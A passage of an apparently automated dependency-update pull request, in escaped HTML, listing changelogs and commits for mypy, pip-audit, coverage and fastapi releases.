view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `mypy` from 1.20.0 to 1.20.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python/mypy/blob/master/CHANGELOG.md\"\u003emypy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003eMypy 1.20.2\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUse WAL with SQLite cache and fix close (Shantanu, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21154\"\u003e21154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdjust SQLite journal mode (Ivan Levkivskyi, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21217\"\u003e21217\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCorrectly aggregate narrowing information on parent expressions (Shantanu, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21206\"\u003e21206\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix regression related to generic callables (Shantanu, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21208\"\u003e21208\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix regression by avoiding widening types in some contexts (Shantanu, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21242\"\u003e21242\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix slicing in non-strict optional mode (Shantanu, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21282\"\u003e21282\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003emypyc: Fix match statement semantics for \u0026quot;or\u0026quot; pattern (Shantanu, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21156\"\u003e21156\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003emypyc: Fix issue with module dunder attributes (Piotr Sawicki, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21275\"\u003e21275\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInitial support for Python 3.15.0a8 (Marc Mueller, PR \u003ca href=\"https://redirect.github.com/python/mypy/pull/21255\"\u003e21255\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAcknowledgements\u003c/h3\u003e\n\u003cp\u003eThanks to all mypy contributors who contributed to this release:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eA5rocks\u003c/li\u003e\n\u003cli\u003eAaron Wieczorek\u003c/li\u003e\n\u003cli\u003eAdam Turner\u003c/li\u003e\n\u003cli\u003eAli Hamdan\u003c/li\u003e\n\u003cli\u003easce\u003c/li\u003e\n\u003cli\u003eBobTheBuidler\u003c/li\u003e\n\u003cli\u003eBrent Westbrook\u003c/li\u003e\n\u003cli\u003eBrian Schubert\u003c/li\u003e\n\u003cli\u003ebzoracler\u003c/li\u003e\n\u003cli\u003eChris Burroughs\u003c/li\u003e\n\u003cli\u003eChristoph Tyralla\u003c/li\u003e\n\u003cli\u003eColin Watson\u003c/li\u003e\n\u003cli\u003eDonghoon Nam\u003c/li\u003e\n\u003cli\u003eE. M. Bray\u003c/li\u003e\n\u003cli\u003eEmma Smith\u003c/li\u003e\n\u003cli\u003eEthan Sarp\u003c/li\u003e\n\u003cli\u003eGeorge Ogden\u003c/li\u003e\n\u003cli\u003egetzze\u003c/li\u003e\n\u003cli\u003egrayjk\u003c/li\u003e\n\u003cli\u003eGregor Riepl\u003c/li\u003e\n\u003cli\u003eIvan Levkivskyi\u003c/li\u003e\n\u003cli\u003eJames Hilliard\u003c/li\u003e\n\u003cli\u003eJames Le Cuirot\u003c/li\u003e\n\u003cli\u003eJeremy Nimmer\u003c/li\u003e\n\u003cli\u003eJoren Hammudoglu\u003c/li\u003e\n\u003cli\u003eKai (Kazuya Ito)\u003c/li\u003e\n\u003cli\u003ekaushal trivedi\u003c/li\u003e\n\u003cli\u003eKevin Kannammalil\u003c/li\u003e\n\u003cli\u003eLukas Geiger\u003c/li\u003e\n\u003cli\u003eŁukasz Langa\u003c/li\u003e\n\u003cli\u003eMarc Mueller\u003c/li\u003e\n\u003cli\u003eMichael R. Crusoe\u003c/li\u003e\n\u003cli\u003emichaelm-openai\u003c/li\u003e\n\u003cli\u003eNeil Schemenauer\u003c/li\u003e\n\u003cli\u003ePiotr Sawicki\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/145a062651b5f9996b75ef32b7040bd2e885ed82\"\u003e\u003ccode\u003e145a062\u003c/code\u003e\u003c/a\u003e Bump version to 1.20.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/81cd49215c288eacb987de066f02daff2553b7c7\"\u003e\u003ccode\u003e81cd492\u003c/code\u003e\u003c/a\u003e Fix slicing with nonstrict optional (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21282\"\u003e#21282\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/908d3441eecbaa2a6193165317177db834d7ca1a\"\u003e\u003ccode\u003e908d344\u003c/code\u003e\u003c/a\u003e [mypyc] Set dunder attrs when adding module to sys.modules (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21275\"\u003e#21275\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/ba28610fac9d2b33be210ca8dcfe4bc47b7af424\"\u003e\u003ccode\u003eba28610\u003c/code\u003e\u003c/a\u003e Initial support for Python 3.15.0a8 (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21255\"\u003e#21255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/7b0e09f48dbd3717ed008a273cd17e8e960c2037\"\u003e\u003ccode\u003e7b0e09f\u003c/code\u003e\u003c/a\u003e Fix match statement semantics for \u0026quot;or\u0026quot; pattern (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21156\"\u003e#21156\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/92b74f226de62f7505f5ef5cb158e8ec9c58b8b7\"\u003e\u003ccode\u003e92b74f2\u003c/code\u003e\u003c/a\u003e Avoid widening types in conditional_types (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21242\"\u003e#21242\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/0dcbfaa40b0e360a16baea9cf851955375d91b54\"\u003e\u003ccode\u003e0dcbfaa\u003c/code\u003e\u003c/a\u003e Fix is_overlapping_types for generic callables (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21208\"\u003e#21208\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/210f518dede35292033ef0d387847406a0ccef8f\"\u003e\u003ccode\u003e210f518\u003c/code\u003e\u003c/a\u003e Correctly aggregate narrowing information on parent expressions (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21206\"\u003e#21206\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/c34530e53a10e385d8b0f1af4baa88a596b5ceaa\"\u003e\u003ccode\u003ec34530e\u003c/code\u003e\u003c/a\u003e Only set journal mode in coordinator (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21217\"\u003e#21217\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python/mypy/commit/79a3ec6d01b56a27c00e9b3320c2b1d4d73a77f9\"\u003e\u003ccode\u003e79a3ec6\u003c/code\u003e\u003c/a\u003e Use WAL with SQLite cache, fix close (\u003ca href=\"https://redirect.github.com/python/mypy/issues/21154\"\u003e#21154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/python/mypy/compare/v1.20.0...v1.20.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pip-audit` from 2.10.0 to 2.10.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/pip-audit/releases\"\u003epip-audit's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.10.1\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a \u003ccode\u003eKeyError\u003c/code\u003e crash when an OSV vulnerability record contains an\n\u003ccode\u003eaffected\u003c/code\u003e entry that omits the optional \u003ccode\u003eranges\u003c/code\u003e field\n(\u003ca href=\"https://redirect.github.com/pypa/pip-audit/pull/1046\"\u003e#1046\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/pip-audit/blob/main/CHANGELOG.md\"\u003epip-audit's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[2.10.1]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a \u003ccode\u003eKeyError\u003c/code\u003e crash when an OSV vulnerability record contains an\n\u003ccode\u003eaffected\u003c/code\u003e entry that omits the optional \u003ccode\u003eranges\u003c/code\u003e field\n(\u003ca href=\"https://redirect.github.com/pypa/pip-audit/pull/1046\"\u003e#1046\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/8894eb8cee033531a1fbd9f2fb160892531c14e3\"\u003e\u003ccode\u003e8894eb8\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1056\"\u003e#1056\u003c/a\u003e from pypa/copilot/release-2101\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/1c625b7f4fd5790e6a05723b2ad9e670629a061d\"\u003e\u003ccode\u003e1c625b7\u003c/code\u003e\u003c/a\u003e Update version in README.md to 2.10.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/fd2094bb7b58438176d65722d77c021750a16f84\"\u003e\u003ccode\u003efd2094b\u003c/code\u003e\u003c/a\u003e Prep 2.10.1 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/58d24880a0053c9ec3ce7e3c35aef6d51d600921\"\u003e\u003ccode\u003e58d2488\u003c/code\u003e\u003c/a\u003e build(deps): bump github/codeql-action from 4.35.2 to 4.36.1 (\u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1052\"\u003e#1052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/8df942058831baec6258f712d42a0bcb03729134\"\u003e\u003ccode\u003e8df9420\u003c/code\u003e\u003c/a\u003e build(deps): bump zizmorcore/zizmor-action from 0.5.3 to 0.5.6 (\u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1044\"\u003e#1044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/3f618d3cde900cd89545d6a3fa4d41612f3b83df\"\u003e\u003ccode\u003e3f618d3\u003c/code\u003e\u003c/a\u003e build(deps): bump actions/checkout from 6.0.2 to 6.0.3 (\u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1053\"\u003e#1053\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/4849132c9ec7a2b0b160ec4276408659d0cdcede\"\u003e\u003ccode\u003e4849132\u003c/code\u003e\u003c/a\u003e Restrict OIDC token to publish job (\u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1050\"\u003e#1050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/c1eb69a71306be7a3ffbbf2bdb59a4cb4eeaa414\"\u003e\u003ccode\u003ec1eb69a\u003c/code\u003e\u003c/a\u003e Fix KeyError when OSV affected entry omits optional \u003ccode\u003eranges\u003c/code\u003e field (\u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1046\"\u003e#1046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/68de07fb9637027f61df7df2620da93f9deb11ec\"\u003e\u003ccode\u003e68de07f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/pip-audit/issues/1054\"\u003e#1054\u003c/a\u003e from pypa/fix/1047\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip-audit/commit/ef31c9ea7ae844d6f9c1f85efceb9d4a2533ef5a\"\u003e\u003ccode\u003eef31c9e\u003c/code\u003e\u003c/a\u003e Formatting fixes\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/pip-audit/compare/v2.10.0...v2.10.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `coverage` from 7.13.5 to 7.14.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/coveragepy/coveragepy/blob/main/CHANGES.rst\"\u003ecoverage's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 7.14.1 — 2026-05-26\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFix: the HTML report used typographic niceties to make file paths more\nreadable by adding a small amount of space around slashes. Those spaces\ninterfered with searching the page for file paths of interest. Now the report\nuses CSS to accomplish the same visual tweak so that searches with slashes\nwork correctly. Closes \u003ccode\u003eissue 2170\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eAdd a 3.16 PyPI classifier \u0026lt;hugo-316_\u0026gt;\u003c/code\u003e_ since we test on the 3.16 main\nbranch.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _issue 2170: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2170\"\u003ecoveragepy/coveragepy#2170\u003c/a\u003e\n.. _hugo-316: \u003ca href=\"https://mastodon.social/@hugovk/116588523571204490\"\u003ehttps://mastodon.social/@​hugovk/116588523571204490\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e.. _changes_7-14-0:\u003c/p\u003e\n\u003ch2\u003eVersion 7.14.0 — 2026-05-10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFeature: now when running one of the reporting commands, if there are\nparallel data files that need combining, they will be implicitly combined\nbefore creating the report. There is no option to avoid the combination; let\nus know if you have a use case that requires it.  Thanks, \u003ccode\u003eTim Hatch \u0026lt;pull 2162_\u0026gt;\u003c/code\u003e\u003cem\u003e. Closes \u003ccode\u003eissue 1781\u003c/code\u003e\u003c/em\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: the output from \u003ccode\u003ecombine\u003c/code\u003e was too verbose, listing each file\nconsidered. Now it shows a single line with the counts of files combined,\nfiles skipped, and files with errors. The \u003ccode\u003e-q\u003c/code\u003e flag suppresses this line.\nThe old detailed lines are available with the new \u003ccode\u003e--debug=combine\u003c/code\u003e option.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: running a Python file through a symlink now sets the sys.path correctly,\nmatching regular Python behavior. Fixes \u003ccode\u003eissue 2157\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: \u003ccode\u003eCollector.flush_data\u003c/code\u003e could fail with \u0026quot;RuntimeError: Set changed\nsize during iteration\u0026quot; when a tracer in another thread added a line to the\nper-file set that \u003ccode\u003eadd_lines\u003c/code\u003e (or \u003ccode\u003eadd_arcs\u003c/code\u003e) was iterating. The values\npassed to \u003ccode\u003eCoverageData\u003c/code\u003e are now snapshotted via \u003ccode\u003edict.copy()\u003c/code\u003e and\n\u003ccode\u003eset.copy()\u003c/code\u003e, which are atomic under the GIL. Thanks, \u003ccode\u003eAlex Vandiver \u0026lt;pull 2165_\u0026gt;\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix: the soft keyword \u003ccode\u003elazy\u003c/code\u003e is now bolded in HTML reports.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eWe are no longer testing eventlet support. Eventlet started issuing stern\ndeprecation warnings that break our tests. Our support code is still there.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _issue 1781: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/1781\"\u003ecoveragepy/coveragepy#1781\u003c/a\u003e\n.. _issue 2157: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2157\"\u003ecoveragepy/coveragepy#2157\u003c/a\u003e\n.. _pull 2162: \u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/pull/2162\"\u003ecoveragepy/coveragepy#2162\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/64d9b66fd852c1920ffe6cb8b58d7e4fdae90226\"\u003e\u003ccode\u003e64d9b66\u003c/code\u003e\u003c/a\u003e docs: correct the date for 7.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/6fa7dd44c25e1a660252faaf030dd8f2f1e20861\"\u003e\u003ccode\u003e6fa7dd4\u003c/code\u003e\u003c/a\u003e chore: bump actions/dependency-review-action (\u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2181\"\u003e#2181\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/078afae263597b004eb9a85d880b6a65008e75ed\"\u003e\u003ccode\u003e078afae\u003c/code\u003e\u003c/a\u003e docs: sample HTML for 7.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/cb4f028a36e008b664739d04f387b90ee5105044\"\u003e\u003ccode\u003ecb4f028\u003c/code\u003e\u003c/a\u003e docs: prep for 7.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/ae2d09f562271c6169534e1c242d015dd0823dda\"\u003e\u003ccode\u003eae2d09f\u003c/code\u003e\u003c/a\u003e Merge branch 'nedbat/classifire-316-kits'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/2c3568b2e041f2c0dbbc8eaa3919d46ee891b743\"\u003e\u003ccode\u003e2c3568b\u003c/code\u003e\u003c/a\u003e build: declare 3.16 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/faa68f8601cf098701b68976dbb73b9fc23c9297\"\u003e\u003ccode\u003efaa68f8\u003c/code\u003e\u003c/a\u003e chore: bump github/codeql-action in the action-dependencies group (\u003ca href=\"https://redirect.github.com/coveragepy/coveragepy/issues/2173\"\u003e#2173\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/eb55feedf54b363e3d0b678f20abf3bfd3551a88\"\u003e\u003ccode\u003eeb55fee\u003c/code\u003e\u003c/a\u003e test: we don't need PyPy \u0026lt; 7.3.22 anymore\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/ac168fe53c04cdb2ff5231c0c4e5045021ee339b\"\u003e\u003ccode\u003eac168fe\u003c/code\u003e\u003c/a\u003e test: the text summary should show missing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coveragepy/coveragepy/commit/fed4bd2db3c1cb2916a07791041da693fbf8e996\"\u003e\u003ccode\u003efed4bd2\u003c/code\u003e\u003c/a\u003e chore: upgrade virtualenv\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/coveragepy/coveragepy/compare/7.13.5...7.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fastapi` from 0.135.3 to 0.136.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapi/fastapi/releases\"\u003efastapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.136.3\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (the default). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15589\"\u003e#15589\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.136.2\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Validate Server Sent Event fields to avoid applications from sending broken data. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15588\"\u003e#15588\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15464\"\u003e#15464\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update and simplify docs about help and management. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15583\"\u003e#15583\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add docs references to central contributing docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15580\"\u003e#15580\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update security policy. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15577\"\u003e#15577\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🍱 Update sponsors: TalorData image. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15562\"\u003e#15562\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update docs, simplify usage of admonitions, only default ones. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15553\"\u003e#15553\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Fix image URLs in \u003ccode\u003eindex.md\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15534\"\u003e#15534\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✏️ Fix Azkaban spelling typo in \u003ccode\u003evirtual-environments.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15463\"\u003e#15463\u003c/a\u003e by \u003ca href=\"https://github.com/isaacbernat\"\u003e\u003ccode\u003e@​isaacbernat\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Improve layout and styling. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15462\"\u003e#15462\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Refactor opinions section with interactive tabs and new logos. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15458\"\u003e#15458\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add FastAPI Conf '26 announcement to docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15457\"\u003e#15457\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTranslations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🌐 Improve translation consistency in \u003ccode\u003e‎docs/pt/docs/advanced/generate-clients.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15456\"\u003e#15456\u003c/a\u003e by \u003ca href=\"https://github.com/Will-thom\"\u003e\u003ccode\u003e@​Will-thom\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ja (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15530\"\u003e#15530\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for uk (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15529\"\u003e#15529\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for pt (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15528\"\u003e#15528\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for de (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15527\"\u003e#15527\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for tr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15526\"\u003e#15526\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ko (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15525\"\u003e#15525\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh-hant (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15524\"\u003e#15524\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for fr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15522\"\u003e#15522\u003c/a\u003e by \u003ca 